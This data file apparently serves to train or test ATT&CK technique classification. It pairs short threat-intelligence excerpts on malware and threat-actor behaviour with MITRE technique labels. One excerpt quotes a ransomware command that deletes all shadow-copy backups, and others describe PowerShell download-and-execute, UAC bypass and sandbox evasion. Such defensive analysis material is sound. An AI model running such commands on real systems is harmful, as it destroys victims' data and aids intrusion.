{"text1":"Daserf \u2014 This backdoor has the functionality of a remote shell and can be used to execute commands, upload and download data, capture screenshots, and log keystrokes. As of this publication, BRONZE BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. T-SMB Scan \u2014 This SMB scanning tool was originally published on a Chinese program-sharing website (pudn.com). BRONZE BUTLER removed its help message functionality. Use malware to upload the large list of enumerated files to the C2 server. Select specific files to steal, creating a new list. Use downloaders or other malware to send the new list to a compromised host. Use archiving software to collect files in a password-protected archive. Use an uploader or other malware to send the archived files to an attacker-controlled server. The uploader software is proprietary to this group, but Datper and xxmm also contain an uploading feature. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity","labels":"['T1083']"}
{"text1":"an extra executable; - process hollowing shellcode; - a list of predefined executable names, which the malware uses as a future process name","labels":"['T1055.012']"}
{"text1":"ISMAgent prioritizes HTTP as its mechanism to communicate with the C2 server, but if it is unable to reach the C2 server it will switch to the DNS tunneling mechanism. To carry out its HTTP C2 communications, the Trojan prepends \"www. to the configured C2 domain and issues a DNS query to resolve this domain","labels":"['T1008']"}
{"text1":"Last week, Unit 42 released a blog on a newly named threat group called DarkHydrus that we observed targeting government entities in the Middle East. The attack that we discussed in our previous publication involved spear-phishing to deliver a PowerShell payload we call RogueRobin; however, we are aware of DarkHydrus carrying out a credential harvesting attack in June 2018. It also appears that this an ongoing campaign, as we have evidence of previous credential harvesting attempts using the same infrastructure dating back to the Fall of 2017. The credential harvesting attacks used spear-phishing emails that contained malicious Microsoft Office documents that leveraged the \u201cattachedTemplate\u201d technique to load a template from a remote server. When attempting to load this remote template, Microsoft Office will display an authentication dialog box to ask the user to provide login credentials. When entered, these credentials are then sent to the C2 server, which allows DarkHydrus to collect the user account credentials. Based on Unit 42\u2019s analysis, DarkHydrus used the open-source Phishery tool to create two of the known Word documents used in these credential harvesting attacks. As discussed in our previous blog, this further strengthens DarkHydrus\u2019 use of the open source for their attack tools. A phishing attack to steal credentials like this is not new: US-CERT warned of the same technique by a different threat group in 2017. Based on this, we can reasonably presume this group will continue to carry out attacks against these kinds of targets in the Middle East in the near-future","labels":"['T1566.001']"}
{"text1":"The instance of Warzone we trapped has the ability to bypass UAC on the latest version of Windows 10. In this blog we\u2019re going to talk about the XLS used as the attack vector and the UAC bypass technique used","labels":"['T1548.002']"}
{"text1":"Aside from security programs and other programs used daily that can be used to profile its targets, the DUBNIUM malware also checks for various program analysis tools including Pin and DynamoRIO. It also checks for a virtual machine environment. If some of these are detected, it quits its execution. Overall, the malware is very cautious and deterministic in running its main code","labels":"['T1497.001']"}
{"text1":"SMOKEDHAM communicates with its C2 server using HTTPS. The backdoor uses domain fronting to obfuscate its true C2 server. The fronted domain is configured by an earlier stage of execution and the actual domain is hard-coded in the backdoor. Mandiant observed the fronted domain lumiahelptipsmscdnqa.microsoft[.]com and hard-coded domain max-ghoster1.azureedge[.]net used for C2 server communication","labels":"['T1090.004']"}
{"text1":"The Leeson, Neoichor, and NumbIdea malware families typically use the Internet Explorer (IE) COM interface to connect and receive commands from hardcoded C2 servers","labels":"['T1559.001']"}
{"text1":"To deliver the malware to the victim machines, the Rocke group exploits vulnerabilities in Apache Struts 2, Oracle WebLogic, and Adobe ColdFusion. For example, by exploiting Oracle WebLogic vulnerability CVE-2017-10271 in Linux shown in Figure 1, a compromised Linux victim machine downloads backdoor 0720.bin and opens a shell","labels":"['T1190']"}
{"text1":"This version includes the stealer features mentioned in the previous version and additionally Remote Administration Tool features such as file uploading\/download and arbitrary command execution. An interesting element is that the malware looks for filenames created with the previous version of KONNI. This implies that the malware targeted the same people as the previous version and they are designed to work together","labels":"['T1083']"}
{"text1":"In the period between January and March 2017 the TeleBots attackers compromised a software company in Ukraine (not related to M.E. Doc), and, using VPN tunnels from there, gained access to the internal networks of several financial institutions","labels":"['T1133']"}
{"text1":"The malware displays fake forms on top of the banking sites and intercepts credentials from the victims. It can also display a fake Windows Update whenever there is nefarious activity in the background, as seen in Figure 23","labels":"['T1056.002']"}
{"text1":"Zlh.exe is a legitimate, signed Norman Safeground AS application, which is used to sideload a malicious nflogger.dll DLL.The encrypted ZeroT payload is usually named NO.2.mui. The sideloaded DLL does not always use the same vulnerable executable, but it is always similar in functionality. Usually the DLL is not packed, but we have observed instances compressed by UPX. This malicious DLL is usually obfuscated with the same junk code: dummy API calls inserted in between real instructions (Fig. 7). The same obfuscation can be found in multiple functions in ZeroT itself","labels":"['T1027.001']"}
{"text1":"TA505 has also recently used LOLbins and legitimate Windows OS processes to perform malicious activities and deliver a payload without being detected. As the entry point of an attack, it delivers a sophisticated email containing a malicious Excel or Word file. The group notably abuses Excel 4.0 macro \u2014 a particularly old macro likely used to evade typical macro detection","labels":"['T1204.002']"}
{"text1":"During one investigation, APT32 was observed using a privilege escalation exploit (CVE-2016-7255) masquerading as a Windows hotfix. In another investigation, APT32 compromised the McAfee ePO infrastructure to distribute their malware as a software deployment task in which all systems pulled the payload from the ePO server using the proprietary SPIPE protocol. APT32 also used hidden or non-printing characters to help visually camouflage their malware on a system. For example, APT32 installed one backdoor as a persistent service with a legitimate service name that had a Unicode no-break space character appended to it. Another backdoor used an otherwise legitimate DLL filename padded with a non-printing OS command control code","labels":"['T1027', 'T1036.004']"}
{"text1":"The attackers also ran the nmap utility on the router VM and scanned ports on systems within the restricted segment of the enterprise network. On September 27, the attackers started removing all traces of their activity from the router, using the logrotate utility to set up automatic deletion of log files","labels":"['T1070.003', 'T1046']"}
{"text1":"PipeMon is a modular backdoor where each module is a single DLL exporting a function called IntelLoader and is loaded using a reflective loading technique. Each module exhibits different functionalities that are shown in Table 2","labels":"['T1129']"}
{"text1":"The next step after installing the malicious service would be to set up tunnels to access to the infected machine from remote hosts, for example using the following command","labels":"['T1090']"}
{"text1":"Turla, also known as Snake, is an infamous espionage group recognized for its complex malware. To confound detection, its operators recently started using PowerShell scripts that provide direct, in-memory loading and execution of malware executables and libraries. This allows them to bypass detection that can trigger when a malicious executable is dropped on disk","labels":"['T1059.001']"}
{"text1":"Four files tested in 2014 are based on the open-source project, cryptcat. Analysis of these cryptcat binaries indicates that the actor continually modified them to decrease AV detection rates. One of these files was deployed in a TEMP.Veles target\u2019s network. The compiled version with the least detections was later re-tested in 2017 and deployed less than a week later during TEMP.Veles activities in the target environment. TEMP.Veles\u2019 lateral movement activities used a publicly-available PowerShell-based tool, WMImplant. On multiple dates in 2017, TEMP.Veles struggled to execute this utility on multiple victim systems, potentially due to AV detection. Four files tested in 2014 are based on the open-source project, cryptcat. Analysis of these cryptcat binaries indicates that the actor continually modified them to decrease AV detection rates. One of these files was deployed in a TEMP.Veles target\u2019s network. On multiple dates in 2017, TEMP.Veles struggled to execute this utility on multiple victim systems, potentially due to AV detection","labels":"['T1027.005']"}
{"text1":"The stage\u2019s 0x102 resource is parsed and the files are dropped in either %ProgramFiles% or %AppData% in the randomly chosen folder. The creation times are changed to have the same values as kernel32.dll","labels":"['T1070.006']"}
{"text1":"Central Command network, including computers both in the headquarters and in the combat zones.The threat involved into this incident is referred as Agent.btz. There is even a clash with another threat that is also detected as Agent.btz by another vendor \u2013 but that's a totally different threat with different functionality. When loaded, its exported function DllEntryPoint() will be called automatically. Once a removable disk is connected to a computer infected with Agent.btz, the active malware will detect a newly recognized drive. It will drop its copy on it and it will create autorun.inf file with an instruction to run that file. Agent.btz file is not packed. Thus, it\u2019s not known what kind of code could have been injected into the browser process. Agent.btz locates this resource by looking for a marker 0xAA45F6F9 in its memory map.File wmcache.nldThe second spawned thread will wait for 10 seconds. The collected network details are also saved into the log file.File winview.ocxThe second spawned thread will log threat activity into the file %system32%\\winview.ocx.This file is also encrypted with the same XOR mask. Note: an attempt to run a valid thumb.db file, which is an OLE-type container has no effect.Files thumb.dd and mssysmgr.ocxAgent.btz is capable to create a binary file thumb.dd on a newly connected drive","labels":"['T1091']"}
{"text1":"The last retrieved module is a persistence module. If the victim appears valuable to the attackers, a GRIFFON implant installer is pushed to the victim\u2019s workstation. This module stores another instance of the GRIFFON implant inside the registry to achieve persistence. Here is a PowerLinks-style method used by the attackers to achieve persistence and execute the GRIFFON implant at each user logon. The new GRIFFON implant is written to the hard drive before each execution, limiting the \u201cfile-less\u201d aspect of this method","labels":"['T1547.001']"}
{"text1":"Another interesting discovery was a tool that was used during attacks to make queries to Active Directory using LDAP. This tool is able to dump detailed information about computers and usernames listed in Active Directory, and is tailored for a specific victim\u2019s domain","labels":"['T1018', 'T1087.002']"}
{"text1":"The attackers then created scheduled tasks that would launch the ransomware with names based on variants of Windows Update Security or Windows Update Security Patches","labels":"['T1053.005']"}
{"text1":"Mouse position: Darkhotel repeatedly checks for the position of the mouse cursor on the screen. If the cursor remains at the center of the desktop, it is unlikely that a real user is using the system. Because of this, most sandboxes periodically move the mouse cursor or perform some other type of interaction with the desktop","labels":"['T1497.002']"}
{"text1":"In what appears to be a first on the cyber-espionage scene, a nation-state-backed hacking group has used a Google Chrome extension to infect victims and steal passwords and cookies from their browsers","labels":"['T1176', 'T1555.003']"}
{"text1":"The Python\/TeleBot malware uses exactly the same approach; the Python backdoor code is obfuscated and packed into a standalone executable using PyInstaller. In addition, the Python code is ROT13 encoded, AES encrypted, compressed using zlib library and then Base64 encoded","labels":"['T1027']"}
{"text1":"But what really makes this backdoor interesting is the way in which it communicates with attackers in order to receive commands. Python\/TeleBot abuses the Telegram Bot API from Telegram Messenger to communicate with the attackers. We have informed Telegram of this abuse of their communication platform","labels":"['T1102.002']"}
{"text1":"The shellcode loaded by the macro contains an encrypted DLL which is decrypted at runtime and then manually mapped into memory by the shellcode. After mapping the DLL, the shellcode jumps to the entry point of that DLL. The shellcode uses some kind of custom hashing method to resolve the APIs. We used hollows_hunter to dump the DLL and reconstruct the IAT once it is fully mapped into memory","labels":"['T1140', 'T1620']"}
{"text1":"It imports the specified Active Directory database NTDS.dit and registry file SYSTEM and exports the found password hashes into RecordedTV_pdump.txt and user details in RecordedTV_users.csv","labels":"['T1003.003']"}
{"text1":"The malware accomplishes this through querying the netsvc group value data located in the svchost group registry key which is HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SvcHost","labels":"['T1012']"}
{"text1":"In most of the samples collected by the CTU research team, Sakula maintains persistence by setting the registry Run key (SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\) in either the HKLM or HKCU hive. Through 2013, registry persistence was set using standard Windows APIs. In the samples compiled in 2014, the adversary switched to adding the Run key by invoking cmd.exe","labels":"['T1547.001']"}
{"text1":"Delete the shadow volumes with vssadmin (\u201cvssadmin Delete Shadows \/all \/quiet\u201d). - Resize the shadow storage for all units starting from C to H units\u2019 letters (hardcoded letters) to avoid the shadow volumes being made again. Using bcedit program to disable the recovery options in the boot of the machine and set to ignore any failure in the boot warning the user","labels":"['T1490']"}
{"text1":"The plugin is a Mimikatz version compiled in the Second_Release_PowerShell configuration. This version can be loaded into the address space of a PowerShell process via reflective DLL loading as implemented in the Exfiltration module of PowerSploit","labels":"['T1055.001']"}
{"text1":"It also has some basic anti-sandbox detection that tries to detect Virtual PC, Sandboxie, and VMware (example in Figure 6","labels":"['T1497.001']"}
{"text1":"When Xbash finds a destination has Hadoop, Redis or ActiveMQ running, it will also attempt to exploit the service for self-propagation. Three known vulnerabilities are targeted","labels":"['T1203']"}
{"text1":"RunningRat is a remote access Trojan (RAT) that operates with two DLLs. This DLL serves three main functions: killing antimalware, unpacking and executing the main RAT DLL, and obtaining persistence. The malware drops the Windows batch file dx.bat, which attempts to kill the task daumcleaner.exe; a Korean security program. The batch file then attempts to remove itself","labels":"['T1059.003']"}
{"text1":"A tool used by the adversary which wasn\u2019t installed on the servers by default, was DSInternals. DSInternals is a PowerShell module that makes use of internal Active Directory features. The files and directories found on various systems of a victim match with DSInternals version 2.16.1. We have found traces that indicate DSInternals was executed and at which time, which match with the rest of the traces of the intrusion. We haven\u2019t recovered traces of how the adversary used DSInternals, but considering the phase of the intrusion the adversary used the tool, it is likely they used it for either account discovery or privilege escalation, or both","labels":"['T1059.001']"}
{"text1":"From the attacks observed by Volexity, what is most notable is that Patchwork has pivoted its targeting and has launched attacks directly against US-based think tanks. Volexity has also found that, in addition to sending malware lures, the Patchwork threat actors are leveraging unique tracking links in their e-mails for the purpose of identifying which recipients opened their e-mail messages. This domain was not only used to send the phishing e-mails, but also to track which targets opened the e-mail. Within each of the HTML-formatted messages, an embedded image tag is used to beacon home to the attacker's domain, containing an unique identifier specific to the recipient. While the use of e-mail recipient tracking, a linked RTF document, and a final payload (QuasarRAT variant) remained the same, certain elements differed across campaigns observed. Exploitation and Malware Execution . Upon opening the above attachments, the recipient will be presented with a document that is a direct copy of a blog post or report released by the think tank organization being impersonated. Its called the \"packager trick\" because any file embedded in an RTF file using packager will be automatically dropped to the %tmp% folder (c:\\Users\\%username%\\AppData\\Local\\Temp) when the RTF document is opened. Second, the threat actors exploit CVE-2017-8570 to achieve code execution via a malicious \"scriptlet\" file, or .sct file, which is also embedded in the malicious RTF document. The Patchwork threat actors also appear to have adopted a technique seen from other APT groups where they are now tracking the effectiveness of their campaigns by recording which recipients have opened the phishing message. Contact . Connect . This Website uses cookies, which are necessary to its functioning and required to achieve the purposes illustrated in our Cookie Policy","labels":"['T1566.002']"}
{"text1":"The malware launches another thread that scans for new drives attached to the system every three seconds. If a new drive is attached to the system and is not identified as a type CDROM drive, the malware begins the encryption process on the new drive. On new drives attached to the system, the malware may create the directory <Drive_letter>:\\$RECYCLE and execute the following command","labels":"['T1120']"}
{"text1":"Shamoon enables the service RemoteRegistry, which allows a program to remotely modify the registry. It also disables remote user account control by enabling the registry key LocalAccountTokenFilterPolicy","labels":"['T1112']"}
{"text1":"SUNSPOT appends an entry in the log file with the date and time of the backdoor attempt and waits for the MsBuild.exe process to exit before restoring the original source code and deleting the temporary InventoryManager.bk file. If the Orion solution build is successful, it is backdoored with SUNBURST","labels":"['T1070.004']"}
{"text1":"TA505 uses fast flux, a DNS technique used to mask botnets by quickly shifting among compromised hosts, which allows cybercriminals to delay or evade detection. The domains the group has been using to distribute payloads were usually resolved across a lot of IPs","labels":"['T1568.001']"}
{"text1":"In at least one instance of EnvyScout delivery, we observed further enumeration of the executing browser\u2019s environment, wherein the user-agent was used to determine whether a Windows machine received an ISO payload. If the visitor arrived via iOS, they were redirected to external infrastructure","labels":"['T1082']"}
{"text1":"Based on our technical analysis, telemetry, and data from submissions, we can assert with high confidence that this is the work of the Hidden Cobra group. These initial findings appear to be the first stage of Operation GhostSecret. For more on the global aspect of this threat, see \u201cGlobal Malware Campaign Pilfers Data from Critical Infrastructure of Entertainment, Finance, Health Care, and Other Industries","labels":"['T1573.001']"}
{"text1":"Enumerate all CLRs loaded in the AD FS process Microsoft.IdentityServer.ServiceHost.exe - For each CLR, enumerate all running application domains and perform the following actions for each domain: Read the contents of the following encrypted FoggyWeb backdoor file into memory: C:\\Windows\\SystemResources\\Windows.Data.TimeZones\\pris\\Windows.Data.TimeZones.zh-PH.pri Decrypt the encrypted FoggyWeb backdoor file using the Lightweight Encryption Algorithm (LEA). The LEA-128 key schedule uses the following hardcoded master key to generate the round keys: - Read the contents of the following encrypted FoggyWeb backdoor file into memory: C:\\Windows\\SystemResources\\Windows.Data.TimeZones\\pris\\Windows.Data.TimeZones.zh-PH.pri - Decrypt the encrypted FoggyWeb backdoor file using the Lightweight Encryption Algorithm (LEA). The LEA-128 key schedule uses the following hardcoded master key to generate the round keys","labels":"['T1140']"}
{"text1":"Interestingly, the ChChes samples we observed were digitally signed using a certificate originally used by HackingTeam and later part of the data leaked when they were themselves hacked. Wapack labs also observed a similar sample targeting Japan in November. It\u2019s not clear why the attackers chose to use this certificate, as it was old, had been leaked online, and had already been revoked by the time they used it. Digital certificates are typically used because they afford an air of legitimacy, which this one definitely does not","labels":"['T1553.002']"}
{"text1":"That persistence is achieved by adding a new task in the task scheduler \u2013 it deploys the malicious sample after every minute, to ensure that it keeps running","labels":"['T1053.005']"}
{"text1":"To further confuse anti-malware solutions, the loader contains the entire unobfuscated code of a legitimate open source application called Blink (https:\/\/github.com\/crosire\/blink), which never gets executed","labels":"['T1027.001']"}
{"text1":"The Calisto installation file is an unsigned DMG image under the guise of Intego\u2019s security solution for Mac","labels":"['T1036.005']"}
{"text1":"The software installed on the compromised computer is of particular interest. Which programs are installed on the system. Which of them are executed automatically at each system start or user logon. Which programs are used by a particular user. If the attackers are interested, they are only one command away from these valuable data","labels":"['T1518']"}
{"text1":"The service-based DLL implant traverses to the \/htdocs\/ directory on the FTP server and looks for any files with the keywords","labels":"['T1083']"}
{"text1":"Finally, Grandoreiro detects two virtual environments \u2013 VMWare via its special I\/O port and Virtual PC via the vpcext instruction","labels":"['T1497.001']"}
{"text1":"The attacker\u2019s choice of IP addresses was also optimized to evade detection. The attacker primarily used only IP addresses originating from the same country as the victim, leveraging Virtual Private Servers","labels":"['T1036']"}
{"text1":"SUNSPOT is StellarParticle\u2019s malware used to insert the SUNBURST backdoor into software builds of the SolarWinds Orion IT management product. SUNSPOT monitors running processes for those involved in compilation of the Orion product and replaces one of the source files to include the SUNBURST backdoor code. Several safeguards were added to SUNSPOT to avoid the Orion builds from failing, potentially alerting developers to the adversary\u2019s presence","labels":"['T1195.002']"}
{"text1":"When the newer service variant of BitPaymer is run, it first determines if it is being executed from an alternate data stream. If it is not executed from an alternate data stream, the malware creates a file in the %APPDATA% folder with a random file name between three and eight characters long, containing uppercase and lowercase letters as well as numbers. It then copies itself to the alternate data stream :bin of the newly created file and creates a new process from the stream","labels":"['T1564.004']"}
{"text1":"Flame appears to have two modules designed for infecting USB sticks, called \u201cAutorun Infector\u201d and \u201cEuphoria\u201d. We haven\u2019t seen them in action yet, maybe due to the fact that Flame appears to be disabled in the configuration data. Nevertheless, the ability to infect USB sticks exists in the code, and it\u2019s using two methods","labels":"['T1091']"}
{"text1":"The modules are signed by an invalid digital certificates listed as \u201cTencent Technology (Shenzhen) Company Limited\u201d with serial numbers, copied from real Tencent certificates","labels":"['T1036.001']"}
{"text1":"Capable of stealing documents sent to the printer queue. Steals written CD images. Capable of stealing files previously seen on removable drives once they are available again. Steals Internet Explorer, Netscape Navigator, FireFox and RealNetworks cookies. If deleted from Frontend file or related registry values, it will reappear after reboot with a new name and startup type","labels":"['T1025']"}
{"text1":"Recall that when the malicious code is executed, it invokes the extract_ei function on its own binary image, to check if the file is infected. If so, it opens itself, and reads the trailer to get the offset of where the file\u2019s original bytes are located. It then writes these bytes out to a new file named: .<orginalfilename>1. This file is then set executable (via chmod) and executed (via execl","labels":"['T1554']"}
{"text1":"Next, the shellcode iterates through the PEB\u2019s loader module list looking for the base address of Kernel32.dll. This is typical of shellcode, as the Kernel32.dll base address is necessary to resolve any dependency files required by the shellcode to run. With this address, the shellcode loads its dependency modules and resolves any necessary Windows Application Programming Interface (API) calls using standard shellcode API hashing. The following modules are loaded","labels":"['T1106']"}
{"text1":"Receive a file path from the C2 for a file to read. The target file is read and then split into smaller files named \"<target_filename>.part_<part_number>\" and stored on disk. This capability can be used to break large files of interest into smaller chunks to prepare them for exfiltration","labels":"['T1030']"}
{"text1":"This introduction of string obfuscation also suggests a development change aimed at evading detection. The header codes, filename references, and all of the operator commands were obfuscated and only decoded during execution of the KeyBoy DLL. Figure 6 shows a sampling of these strings, after decoding","labels":"['T1027']"}
{"text1":"The developer implemented a total of seven techniques to identify if the compromised system is a virtual machine. Additionally, the malware checks the SerialNumber and the version of the BIOS. The third technique uses the Win32_Computer entry in WMI. It checks if the manufacturer contains \"VIRTUAL\", \"VMWARE\" or \"VirtualBox\". The fourth technique checks the Processor ID of the system. The WMI request simply replies \"not supported\". This behaviour can be used to detect if the targeted system is a real machine. The last technique uses the MAC Address of the infected system. If the MAC Address starts by a well-known hexadecimal number, the system is identified as a virtual machine. The variant version of GX is used in the URI","labels":"['T1497.001']"}
{"text1":"COBALT DICKENS uses publicly available tools, including the SingleFile plugin available on GitHub and the free HTTrack Website Copier standalone application, to copy the login pages of targeted university resources. Metadata in a spoofed login page created on August 1 suggests that COBALT DICKENS sometimes uses older copied versions of target websites. A comment left in the source code indicates it was originally copied on May 1, 2017 (see Figure 3). However, the university was targeted by numerous COBALT DICKENS operations, including the August 2018 and August 2019 campaigns","labels":"['T1588.002']"}
{"text1":"NOBELIUM, with existing administrative permissions, was observed to drop a malicious loader named version.dll in the %WinDir%\\ADFS\\ folder where the AD FS service executable Microsoft.IdentityServer.ServiceHost.exe is located. Once the system or the AD FS service is restarted, Microsoft.IdentityServer.ServiceHost.exe loads mscoree.dll, which in turn loads mscoreei.dll. As mentioned above, mscoreei.dll has a delay load import named version.dll","labels":"['T1574.001']"}
{"text1":"In recent BitPaymer IR engagements, Falcon Intelligence linked the initial infection vector to fake updates for a FlashPlayer plugin and the Chrome web browser. These fake updates are served via legitimate websites that have been compromised, and use social engineering to trick users into downloading and running a malicious executable. These fake update campaigns appear to be a pay-per-install service that is simply used by INDRIK SPIDER to deliver its malware, as other malware has also been delivered via the same campaigns","labels":"['T1036.005', 'T1584.004']"}
{"text1":"One of the reconnaissance commands was to run a modified nbtscan tool (\"NetBIOS nameserver scanner\") to identify available NetBIOS name servers locally or over the network. Nbtscan has been used by APT10 in Operation Cloud Hopper to search for services of interest across the IT estate and footprint endpoints of interest. It is also capable of identifying system information","labels":"['T1016', 'T1018']"}
{"text1":"The attacker used a temporary file replacement technique to remotely execute utilities: they replaced a legitimate utility with theirs, executed their payload, and then restored the legitimate original file. They similarly manipulated scheduled tasks by updating an existing legitimate task to execute their tools and then returning the scheduled task to its original configuration. They routinely removed their tools, including removing backdoors once legitimate remote access was achieved","labels":"['T1070.004', 'T1070', 'T1053.005']"}
{"text1":"Modifying the Standard Information timestamps (created, modified, accessed) of every downloaded executable to match a randomly selected file from the System32 directory that was created prior to 2013","labels":"['T1070.006']"}
{"text1":"1) Suckfly's first step was to identify a user to target so the attackers could attempt their initial breach into the e-commerce company's internal network. 2) On April 22, 2015, Suckfly exploited a vulnerability on the targeted employee's operating system (Windows) that allowed the attackers to bypass the User Account Control and install the Nidiran back door to provide access for their attack. 3) After the attackers successfully exploited the employee\u2019s system, they gained access to the e-commerce company's internal network. To do this the attackers used a signed credential-dumping tool to obtain the victim's account credentials. With the account credentials, the attackers were able to access the victim's account and navigate the internal corporate network as though they were the employee. 4) On April 27, the attackers scanned the corporate internal network for hosts with ports 8080, 5900, and 40 open. Ports 8080 and 5900 are common ports used with legitimate protocols, but can be abused by attackers when they are not secured. Based on Suckfly scanning for common ports, it\u2019s clear that the group was looking to expand its foothold on the e-commerce company's internal network. 5) The attackers\u2019 final step was to exfiltrate data off the victim\u2019s network and onto Suckfly\u2019s infrastructure. While we know that the attackers used the Nidiran back door to steal information about the compromised organization, we do not know if Suckfly was successful in stealing other information","labels":"['T1078']"}
{"text1":"After these strings are decrypted, the malware will load a series of Microsoft Windows API calls to be used later on. After these functions are loaded, Comnie determines if it is running within the %TEMP% directory of the victim machine. In the event it is not running within this directory, it will copy itself to %TEMP% and execute this newly created file with an argument of the original file\u2019s path. A total of 64MB of garbage data is appended to this copied file, likely as a way to deter any security products in place that may be scanning files on disk. After running within the %TEMP% path, Comnie will delete the original file. After Comnie has been copied to the %TEMP% directory, it will look for the presence of the \u2018DQuit.tmp\u2019 file in this path. It is unclear how this file is used exactly, as it does not appear to ever be written during runtime by Comnie. Comnie continue to enter its installation routine. In doing so, it will attempt to detect the following Anti-Virus products via various techniques","labels":"['T1027.001']"}
{"text1":"This list of strings differs from previously analyzed SofacyCarberp samples, such as the variant discussed in our June 2016 blog \u201cNew Sofacy Attacks Against US Government Agency\u201c that chose from a list of strings .xml, .pdf, .htm or .zip. After establishing that the system has Internet access, the Trojan will gather detailed system information and send it to the C2 server","labels":"['T1082']"}
{"text1":"In April, security researchers in the Microsoft Threat Intelligence Center discovered infrastructure of\u00a0a known adversary communicating to several external devices. Further research uncovered attempts by the actor to compromise popular IoT devices (a VOIP phone, an office printer, and a video decoder) across multiple customer locations. The investigation uncovered that an actor had used these devices to gain initial access to corporate networks. In two of the cases, the passwords for the devices were deployed without changing the default manufacturer\u2019s passwords and in the third instance the latest security update had not been applied to the device","labels":"['T1078']"}
{"text1":"When exploiting the intended targets, the threat actors used malicious .docx files to capture user credentials. The documents retrieved a file through a \u201cfile:\/\/\u201d connection over SMB using Transmission Control Protocol (TCP) ports 445 or 139. When a user attempted to authenticate to the domain, the C2 server was provided with the hash of the password. Local users received a graphical user interface (GUI) prompt to enter a username and password, and the C2 received this information over TCP ports 445 or 139. Note: a file transfer is not necessary for a loss of credential information. Symantec\u2019s report associates this behavior to the Dragonfly threat actors in this campaign. 1](link is external","labels":"['T1187']"}
{"text1":"Otherwise, the malware bypasses UAC and escalates privileges with two different approaches \u2013 one for Windows 10 and the other for older versions","labels":"['T1548.002']"}
{"text1":"The logging functions are hooked so that whenever the backdoor is used, nothing gets sent to the logging facility, leaving no trace of the backdoor in the log files on disk. If the backdoor is not in use, logging will behave normally and function calls will get redirected to the original function implementation","labels":"['T1562.006']"}
{"text1":"The second part of API hooking hooks on \u201cGetExtendedTcpTable. GetExtendedTcpTable\u201d is used for retrieving a table that contains a list of TCP endpoints available to the application, and it is frequently used in some network-related commands, such as netstat. The purpose of the hook is to remove TCP endpoint records of certain PIDs. The second function, \u201cGetRTTAndHopCount,\u201d acts as the place to put the injected hooking code","labels":"['T1049']"}
{"text1":"The output of the downloaded batch file is saved to \u201c%PUBLIC%\\Libraries\\tp\\<batch filename>.txt\u201d. The script will then upload the output of this batch file by including the data in a sequence of DNS queries. The exfiltrates the output of the batch script by splitting up the data within the text file into chunks up to 23 bytes and sends the data within a series of DNS queries that have the following structure","labels":"['T1030']"}
{"text1":"Installs UnionCryptoTrader in folder \/Applications\/UnionCryptoTrader.app\/Contents\/MacOS\/ - Installs .unioncryptoupdater in folder \/Applications\/UnionCryptoTrader.app\/Contents\/Resources\/ Note: the leading \u201c.\u201d makes it unlisted in the Finder app or default Terminal directory listing - Note: the leading \u201c.\u201d makes it unlisted in the Finder app or default Terminal directory listing - Executes a postinstall script Moves .vip.unioncrypto.plist to folder LaunchDaemons Changes the file permissions on the plist to Root Runs unioncryptoupdater Moves .unioncryptoupdater to folder \/Library\/UnionCrypto\/unioncryptoupdater Makes .unioncryptoupdater executable - Moves .vip.unioncrypto.plist to folder LaunchDaemons - Changes the file permissions on the plist to Root - Runs unioncryptoupdater - Moves .unioncryptoupdater to folder \/Library\/UnionCrypto\/unioncryptoupdater - Makes .unioncryptoupdater executable","labels":"['T1564.001']"}
{"text1":"It uses GetlogicalDrives to get a bitmask of all the drives available on the system, then iterates over each possible drive letter","labels":"['T1082']"}
{"text1":"Ryuk does not encrypt files from within its own process memory space, but injects into a remote process. Before injecting into a remote process, Ryuk attempts to adjust its token privileges to have the SeDebugPrivilege. Before injecting into a remote process, Ryuk also calls CreateToolhelp32Snapshot to enumerate all running processes. If a process is found that is not named csrss.exe, explorer.exe, lsaas.exe, or is running under NT AUTHORITY system account, Ryuk will inject itself into this single process. By ensuring that the process is not running under NT AUTHORITY, the developers are assuming the process is not running under another account and therefore can be written to. Ryuk uses a combination of VirtualAlloc, WriteProcessMemory and CreateRemoteThread to inject itself into the remote process","labels":"['T1055']"}
{"text1":"Next, the third-stage DLL will load the \"Waqybg\" resource into memory. As the resource is stored in reverse byte order, the third-stage DLL will restore it by reversing the bytes and then proceed to decompress it. The decompressed data is the fourth stage wiper payload. After decompressing the data, the third-stage DLL copies a legitimate Windows utility \"InstallUtil.exe\" into the %TEMP% directory, creates a suspended process with it and injects the fourth-stage wiper into the process. Finally, it resumes the process and transfers the execution flow to the fourth-stage wiper. Creates InstallUtil.exe process","labels":"['T1055']"}
{"text1":"Whitefly has consistently used a technique known as search order hijacking to run Vcrodat. This technique takes advantage of the fact that Windows does not require an application to provide a specific path for a DLL that it wishes to load. If no path is provided, Windows searches for the DLL in specific locations on the computer in a pre-defined order. Attackers can therefore give a malicious DLL the same name as a legitimate DLL but place it ahead of the legitimate version in the search order so that it will be loaded when Windows searches for it. Whitefly frequently delivers Vcrodat as a malicious DLL that has the same name as DLLs belonging to legitimate software from various security vendors. The group leverages search order hijacking to assure that its malicious DLLs will be executed. Targeting security applications could allow the attackers to gain higher privileges for the malware, since the vendor\u2019s component may be run with elevated privileges","labels":"['T1036.005']"}
{"text1":"The malware\u2019s next action is to check if the execute privilege is SYSTEM. When the execute privilege is SYSTEM, the malware will get the process \u201cExplorer.exe\u201d, get the token of the user that launched the process and impersonate it. It is a downgrade from SYSTEM to another user with less privileges to avoid affecting the desktop of the SYSTEM user later","labels":"['T1134.001']"}
{"text1":"The threat actors commonly created web shells on the intended targets\u2019 publicly accessible email and web servers. The threat actors used three different filenames (\u201cglobal.aspx, autodiscover.aspx and index.aspx) for two different webshells","labels":"['T1505.003']"}
{"text1":"Currently LockerGoga does not support any worm-like capabilities that would allow it to self-propagate by infecting additional hosts on a target network. We have observed LockerGoga moving around a network via the server message block (SMB) protocol, which indicates the actors simply manually copy files from computer to computer","labels":"['T1570']"}
{"text1":"Finally, command line tried to execute (iex is an alias for Invoke-Expression) the code downloaded from the IP address 104[.]168[.]237[.]21. Threat actors abused sslip.io for connection to C&C - a service that provides free IP to domain mapping to make SSL certificate generation easier for traffic encryption. While this service is legitimate and widely used, the malware abused it in an attempt at evading detection when connecting to C&C servers","labels":"['T1102']"}
{"text1":"If the payload determines it is not running in a sandbox, it will attempt to install itself to the system to persistently execute","labels":"['T1547.009']"}
